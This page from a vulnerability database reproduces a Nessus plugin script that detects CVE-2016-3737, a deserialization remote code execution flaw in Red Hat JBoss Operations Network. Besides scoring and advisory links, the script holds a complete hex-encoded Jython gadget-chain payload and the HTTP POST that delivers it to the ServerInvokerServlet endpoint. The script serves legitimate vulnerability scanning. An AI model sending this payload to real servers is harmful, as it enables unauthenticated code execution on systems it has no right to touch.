Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.JBOSS_ON_DESERIALIZE_CC.NASL
HistoryJun 06, 2016 - 12:00 a.m.

Red Hat JBoss Operations Network Java Object Deserialization RCE

2016-06-0600:00:00
This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
19

9 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:P/I:P/A:C

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.008 Low

EPSS

Percentile

81.6%

JSON

The remote Red Hat JBoss Operations Network server is affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the Jython library. An unauthenticated, remote attacker can exploit this, by sending specially crafted Java objects to the HTTP interface, to execute arbitrary code on the target host.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(91487);
  script_version("1.11");
  script_cvs_date("Date: 2019/11/19");

  script_cve_id("CVE-2016-3737");
  script_bugtraq_id(90430);
  script_xref(name:"TRA", value:"TRA-2016-22");

  script_name(english:"Red Hat JBoss Operations Network Java Object Deserialization RCE");
  script_summary(english:"Sends an unexpected Java object to the server.");

  script_set_attribute(attribute:"synopsis", value:
"The remote JBoss Operations Network server is affected by a remote
code execution vulnerability");
  script_set_attribute(attribute:"description", value:
"The remote Red Hat JBoss Operations Network server is affected by a
remote code execution vulnerability due to unsafe deserialize calls of
unauthenticated Java objects to the Jython library. An
unauthenticated, remote attacker can exploit this, by sending
specially crafted Java objects to the HTTP interface, to execute
arbitrary code on the target host.");
  script_set_attribute(attribute:"see_also", value:"https://www.tenable.com/security/research/tra-2016-22");
  script_set_attribute(attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2016-3737");
  script_set_attribute(attribute:"solution", value:
"Red Hat has released JBoss Operations Network 3.3 Update 06 to address
this issue; however, Tenable Research has confirmed that the update
did not resolve the issue. To mitigate this issue, users should enable
agent authentication.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-3737");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2016/05/02");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/06/24");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/06/06");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_operations_network");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("jboss_on_detect.nbin");
  script_require_keys("installed_sw/JBoss Operations Network");
  script_require_ports("Services/www", 7080, 7443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("webapp_func.inc");
include("http.inc");

appname = 'JBoss Operations Network';
get_install_count(app_name:appname, exit_if_zero:TRUE);
port = get_http_port(default:7080);
install = get_single_install(app_name:appname, port:port);

# This blob is (eventually) a PyFunction that, upon deserialization, will simply execute
# the python byte code "return". Technically speaking, we could do much more than that
# but we only have builtins available to us (so r/w files), but it is far easier to determine
# that the remote server is vulnerable via the class cast exception that occurs on success.
crafted_object = '\xac\xed\x00\x05\x73\x72\x00\x17\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x50\x72\x69\x6f\x72\x69\x74\x79\x51\x75\x65\x75\x65\x94\xda\x30\xb4\xfb\x3f\x82\xb1\x03\x00\x02\x49\x00\x04\x73\x69\x7a\x65\x4c\x00\x0a\x63\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\x3b\x78\x70\x00\x00\x00\x02\x73\x7d\x00\x00\x00\x01\x00\x14\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x72\x00\x1a\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x46\x75\x6e\x63\x74\x69\x6f\x6e\xe6\x2f\xd1\xed\x36\x06\xb6\x52\x02\x00\x08\x4c\x00\x08\x5f\x5f\x64\x69\x63\x74\x5f\x5f\x74\x00\x1a\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x50\x79\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x07\x5f\x5f\x64\x6f\x63\x5f\x5f\x71\x00\x7e\x00\x08\x4c\x00\x0a\x5f\x5f\x6d\x6f\x64\x75\x6c\x65\x5f\x5f\x71\x00\x7e\x00\x08\x4c\x00\x08\x5f\x5f\x6e\x61\x6d\x65\x5f\x5f\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0c\x66\x75\x6e\x63\x5f\x63\x6c\x6f\x73\x75\x72\x65\x71\x00\x7e\x00\x08\x4c\x00\x09\x66\x75\x6e\x63\x5f\x63\x6f\x64\x65\x74\x00\x18\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x50\x79\x43\x6f\x64\x65\x3b\x5b\x00\x0d\x66\x75\x6e\x63\x5f\x64\x65\x66\x61\x75\x6c\x74\x73\x74\x00\x1b\x5b\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x50\x79\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0c\x66\x75\x6e\x63\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x71\x00\x7e\x00\x08\x78\x72\x00\x18\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x4f\x62\x6a\x65\x63\x74\xb3\x6a\x64\xf0\x6f\x10\xd3\x67\x02\x00\x02\x4c\x00\x09\x6a\x61\x76\x61\x50\x72\x6f\x78\x79\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x07\x6f\x62\x6a\x74\x79\x70\x65\x74\x00\x18\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x50\x79\x54\x79\x70\x65\x3b\x78\x70\x70\x73\x72\x00\x23\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x54\x79\x70\x65\x24\x54\x79\x70\x65\x52\x65\x73\x6f\x6c\x76\x65\x72\x7b\x81\x53\xc5\x9e\x62\x6a\xf9\x02\x00\x03\x4c\x00\x06\x6d\x6f\x64\x75\x6c\x65\x71\x00\x7e\x00\x09\x4c\x00\x04\x6e\x61\x6d\x65\x71\x00\x7e\x00\x09\x4c\x00\x10\x75\x6e\x64\x65\x72\x6c\x79\x69\x6e\x67\x5f\x63\x6c\x61\x73\x73\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x74\x00\x0b\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x5f\x5f\x74\x00\x08\x66\x75\x6e\x63\x74\x69\x6f\x6e\x76\x71\x00\x7e\x00\x07\x70\x70\x70\x74\x00\x08\x3c\x6d\x6f\x64\x75\x6c\x65\x3e\x70\x73\x72\x00\x1a\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x42\x79\x74\x65\x63\x6f\x64\x65\xac\x96\xf9\x29\x14\x55\x26\x12\x02\x00\x08\x49\x00\x0c\x63\x6f\x5f\x73\x74\x61\x63\x6b\x73\x69\x7a\x65\x49\x00\x05\x63\x6f\x75\x6e\x74\x5a\x00\x05\x64\x65\x62\x75\x67\x49\x00\x08\x6d\x61\x78\x43\x6f\x75\x6e\x74\x5b\x00\x07\x63\x6f\x5f\x63\x6f\x64\x65\x74\x00\x02\x5b\x42\x5b\x00\x09\x63\x6f\x5f\x63\x6f\x6e\x73\x74\x73\x71\x00\x7e\x00\x0b\x5b\x00\x09\x63\x6f\x5f\x6c\x6e\x6f\x74\x61\x62\x71\x00\x7e\x00\x18\x5b\x00\x08\x63\x6f\x5f\x6e\x61\x6d\x65\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x78\x72\x00\x1a\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x42\x61\x73\x65\x43\x6f\x64\x65\x5e\x76\xd4\x44\x41\xc3\x94\x74\x02\x00\x0c\x49\x00\x0b\x63\x6f\x5f\x61\x72\x67\x63\x6f\x75\x6e\x74\x49\x00\x0e\x63\x6f\x5f\x66\x69\x72\x73\x74\x6c\x69\x6e\x65\x6e\x6f\x49\x00\x0a\x63\x6f\x5f\x6e\x6c\x6f\x63\x61\x6c\x73\x49\x00\x0c\x6a\x79\x5f\x6e\x70\x75\x72\x65\x63\x65\x6c\x6c\x49\x00\x05\x6e\x61\x72\x67\x73\x5a\x00\x07\x76\x61\x72\x61\x72\x67\x73\x5a\x00\x09\x76\x61\x72\x6b\x77\x61\x72\x67\x73\x5b\x00\x0b\x63\x6f\x5f\x63\x65\x6c\x6c\x76\x61\x72\x73\x71\x00\x7e\x00\x19\x4c\x00\x0b\x63\x6f\x5f\x66\x69\x6c\x65\x6e\x61\x6d\x65\x71\x00\x7e\x00\x09\x4c\x00\x08\x63\x6f\x5f\x66\x6c\x61\x67\x73\x74\x00\x1f\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x43\x6f\x6d\x70\x69\x6c\x65\x72\x46\x6c\x61\x67\x73\x3b\x5b\x00\x0b\x63\x6f\x5f\x66\x72\x65\x65\x76\x61\x72\x73\x71\x00\x7e\x00\x19\x5b\x00\x0b\x63\x6f\x5f\x76\x61\x72\x6e\x61\x6d\x65\x73\x71\x00\x7e\x00\x19\x78\x72\x00\x16\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x43\x6f\x64\x65\x74\x54\x66\x12\x37\x82\xc5\x3b\x02\x00\x01\x4c\x00\x07\x63\x6f\x5f\x6e\x61\x6d\x65\x71\x00\x7e\x00\x09\x78\x71\x00\x7e\x00\x0c\x70\x73\x71\x00\x7e\x00\x10\x71\x00\x7e\x00\x13\x74\x00\x08\x62\x79\x74\x65\x63\x6f\x64\x65\x76\x71\x00\x7e\x00\x17\x71\x00\x7e\x00\x16\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x70\x74\x00\x06\x6e\x6f\x6e\x61\x6d\x65\x73\x72\x00\x1d\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x43\x6f\x6d\x70\x69\x6c\x65\x72\x46\x6c\x61\x67\x73\x6c\xb8\x3b\x06\x8e\xbb\x10\x0f\x02\x00\x05\x5a\x00\x11\x64\x6f\x6e\x74\x5f\x69\x6d\x70\x6c\x79\x5f\x64\x65\x64\x65\x6e\x74\x5a\x00\x08\x6f\x6e\x6c\x79\x5f\x61\x73\x74\x5a\x00\x0e\x73\x6f\x75\x72\x63\x65\x5f\x69\x73\x5f\x75\x74\x66\x38\x4c\x00\x08\x65\x6e\x63\x6f\x64\x69\x6e\x67\x71\x00\x7e\x00\x09\x4c\x00\x05\x66\x6c\x61\x67\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x53\x65\x74\x3b\x78\x70\x00\x00\x00\x70\x73\x72\x00\x24\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x45\x6e\x75\x6d\x53\x65\x74\x24\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x50\x72\x6f\x78\x79\x05\x07\xd3\xdb\x76\x54\xca\xd1\x02\x00\x02\x4c\x00\x0b\x65\x6c\x65\x6d\x65\x6e\x74\x54\x79\x70\x65\x71\x00\x7e\x00\x11\x5b\x00\x08\x65\x6c\x65\x6d\x65\x6e\x74\x73\x74\x00\x11\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x6e\x75\x6d\x3b\x78\x70\x76\x72\x00\x18\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x43\x6f\x64\x65\x46\x6c\x61\x67\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x78\x72\x00\x0e\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x6e\x75\x6d\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x78\x70\x75\x72\x00\x11\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x6e\x75\x6d\x3b\xa8\x8d\xea\x2d\x33\xd2\x2f\x98\x02\x00\x00\x78\x70\x00\x00\x00\x02\x7e\x71\x00\x7e\x00\x28\x74\x00\x09\x43\x4f\x5f\x4e\x45\x53\x54\x45\x44\x7e\x71\x00\x7e\x00\x28\x74\x00\x14\x43\x4f\x5f\x47\x45\x4e\x45\x52\x41\x54\x4f\x52\x5f\x41\x4c\x4c\x4f\x57\x45\x44\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x00\x71\x00\x7e\x00\x33\x00\x00\x00\x0a\x00\x00\x00\x00\x00\xff\xff\xff\xff\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x00\x04\x64\x00\x00\x53\x75\x72\x00\x1b\x5b\x4c\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x4f\x62\x6a\x65\x63\x74\x3b\x25\x04\x40\xd5\x1b\xd0\x04\x3f\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00\x18\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x53\x74\x72\x69\x6e\x67\x2d\x43\xb5\xfa\x3c\xac\x49\xd1\x02\x00\x01\x4c\x00\x06\x73\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x09\x78\x72\x00\x1c\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x42\x61\x73\x65\x53\x74\x72\x69\x6e\x67\x25\x17\x51\xe8\xb3\x09\x2f\x9c\x02\x00\x00\x78\x72\x00\x1a\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x53\x65\x71\x75\x65\x6e\x63\x65\xa1\x41\x11\xa8\xfb\xc3\xae\x67\x02\x00\x01\x4c\x00\x09\x64\x65\x6c\x65\x67\x61\x74\x6f\x72\x74\x00\x27\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x53\x65\x71\x75\x65\x6e\x63\x65\x49\x6e\x64\x65\x78\x44\x65\x6c\x65\x67\x61\x74\x65\x3b\x78\x71\x00\x7e\x00\x0c\x70\x73\x71\x00\x7e\x00\x10\x71\x00\x7e\x00\x13\x74\x00\x03\x73\x74\x72\x76\x71\x00\x7e\x00\x38\x73\x72\x00\x1c\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x53\x65\x71\x75\x65\x6e\x63\x65\x24\x31\xd7\x1b\xb3\xc6\xac\x1f\x60\xd7\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x1c\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x50\x79\x53\x65\x71\x75\x65\x6e\x63\x65\x3b\x78\x72\x00\x25\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x53\x65\x71\x75\x65\x6e\x63\x65\x49\x6e\x64\x65\x78\x44\x65\x6c\x65\x67\x61\x74\x65\x17\xcf\xdb\x2f\xe9\xe7\x04\xc2\x02\x00\x00\x78\x70\x71\x00\x7e\x00\x3c\x71\x00\x7e\x00\x33\x73\x71\x00\x7e\x00\x38\x70\x71\x00\x7e\x00\x3d\x73\x71\x00\x7e\x00\x40\x71\x00\x7e\x00\x44\x74\x00\x13\x2e\x2f\x6e\x65\x73\x73\x75\x73\x5f\x6a\x79\x74\x68\x6f\x6e\x31\x2e\x70\x79\x73\x71\x00\x7e\x00\x38\x70\x71\x00\x7e\x00\x3d\x73\x71\x00\x7e\x00\x40\x71\x00\x7e\x00\x47\x74\x00\x02\x77\x2b\x73\x71\x00\x7e\x00\x38\x70\x71\x00\x7e\x00\x3d\x73\x71\x00\x7e\x00\x40\x71\x00\x7e\x00\x4a\x74\x00\x00\x75\x71\x00\x7e\x00\x34\x00\x00\x00\x00\x75\x71\x00\x7e\x00\x31\x00\x00\x00\x04\x74\x00\x04\x6f\x70\x65\x6e\x74\x00\x05\x77\x72\x69\x74\x65\x74\x00\x05\x63\x6c\x6f\x73\x65\x74\x00\x08\x65\x78\x65\x63\x66\x69\x6c\x65\x70\x73\x72\x00\x1b\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x53\x74\x72\x69\x6e\x67\x4d\x61\x70\xb4\x24\xfa\xff\x19\x86\x24\x79\x02\x00\x01\x4c\x00\x05\x74\x61\x62\x6c\x65\x74\x00\x24\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x4d\x61\x70\x3b\x78\x71\x00\x7e\x00\x0c\x70\x73\x71\x00\x7e\x00\x10\x71\x00\x7e\x00\x13\x74\x00\x09\x73\x74\x72\x69\x6e\x67\x6d\x61\x70\x76\x71\x00\x7e\x00\x53\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x64\x99\xde\x12\x9d\x87\x29\x3d\x03\x00\x03\x49\x00\x0b\x73\x65\x67\x6d\x65\x6e\x74\x4d\x61\x73\x6b\x49\x00\x0c\x73\x65\x67\x6d\x65\x6e\x74\x53\x68\x69\x66\x74\x5b\x00\x08\x73\x65\x67\x6d\x65\x6e\x74\x73\x74\x00\x31\x5b\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x3b\x78\x70\x00\x00\x00\x0f\x00\x00\x00\x1c\x75\x72\x00\x31\x5b\x4c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x3b\x52\x77\x3f\x41\x32\x9b\x39\x74\x02\x00\x00\x78\x70\x00\x00\x00\x10\x73\x72\x00\x2e\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x1f\x36\x4c\x90\x58\x93\x29\x3d\x02\x00\x01\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x78\x72\x00\x28\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x66\x55\xa8\x2c\x2c\xc8\x6a\xeb\x02\x00\x01\x4c\x00\x04\x73\x79\x6e\x63\x74\x00\x2f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x6c\x6f\x63\x6b\x73\x2f\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x53\x79\x6e\x63\x3b\x78\x70\x73\x72\x00\x34\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x4e\x6f\x6e\x66\x61\x69\x72\x53\x79\x6e\x63\x65\x88\x32\xe7\x53\x7b\xbf\x0b\x02\x00\x00\x78\x72\x00\x2d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x53\x79\x6e\x63\xb8\x1e\xa2\x94\xaa\x44\x5a\x7c\x02\x00\x00\x78\x72\x00\x35\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x51\x75\x65\x75\x65\x64\x53\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x72\x66\x55\xa8\x43\x75\x3f\x52\xe3\x02\x00\x01\x49\x00\x05\x73\x74\x61\x74\x65\x78\x72\x00\x36\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x4f\x77\x6e\x61\x62\x6c\x65\x53\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x72\x33\xdf\xaf\xb9\xad\x6d\x6f\xa9\x02\x00\x00\x78\x70\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x70\x70\x78\x77\x04\x00\x00\x00\x03\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x71\x00\x7e\x00\x87\x78';

# post our crafted object to the server
path = "/jboss-remoting-servlet-invoker/ServerInvokerServlet/?generalizeSocketException=true";
resp = http_send_recv3(
  method:"POST",
  item:path,
  data:crafted_object,
  add_headers:make_array("Content-Type", "application/octet-stream", "JBoss-Remoting-Version", "22"),
  port:port,
  exit_on_fail:TRUE);

if (isnull(resp) || len(resp) != 3) audit(AUDIT_RESP_BAD, port);
if ("java.lang.ClassCastException: org.python.core.PySingleton cannot be cast to" >!< resp[2])
  audit(AUDIT_INST_VER_NOT_VULN, appname, install["version"]);

report =
  '\nNessus was able to exploit a Java deserialization vulnerability by' +
  '\nsending a crafted Java object.' +
  '\n';
security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);
VendorProductVersionCPE
redhatjboss_operations_networkcpe:/a:redhat:jboss_operations_network

Related

redhatcve 2
nvd 2
openvas 1
cve 2
cvelist 2
prion 2
redhat 1
redhatcve
redhatcve
CVE-2016-3737
2016-08-26 01:12:40
CVE-2016-6330
2016-08-22 01:18:41
nvd
nvd
CVE-2016-3737
2016-08-02 14:59:01
CVE-2016-6330
2016-09-27 15:59:06
openvas
openvas
Red Hat JBoss Operations Network (JON) < 3.3.6 Deserialization RCE Vulnerability
2016-07-28 00:00:00
cve
cve
CVE-2016-3737
2016-08-02 14:59:01
CVE-2016-6330
2016-09-27 15:59:06
cvelist
cvelist
CVE-2016-3737
2016-08-02 14:00:00
CVE-2016-6330
2016-09-27 15:00:00
prion
prion
Deserialization of untrusted data
2016-08-02 14:59:00
Deserialization of untrusted data
2016-09-27 15:59:00
redhat
redhat
(RHSA-2016:1519) Critical: Red Hat JBoss Operations Network 3.3.6 update
2016-07-27 15:19:01

9 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:P/I:P/A:C

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

